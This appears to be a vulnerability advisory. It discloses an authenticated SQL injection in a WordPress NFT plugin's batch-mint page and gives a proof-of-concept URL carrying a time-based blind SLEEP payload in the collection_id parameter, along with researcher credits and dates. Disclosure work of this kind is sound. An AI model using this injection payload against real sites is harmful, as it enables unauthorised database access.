The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author
Logon as an author and open the following URL, which will result in a delayed response https://example.com/wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(4)))hlAf)&uid=1
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Kunal Sharma
Yes
2022-11-07 (about 4 months ago)
2022-11-07 (about 4 months ago)
2022-12-02 (about 3 months ago)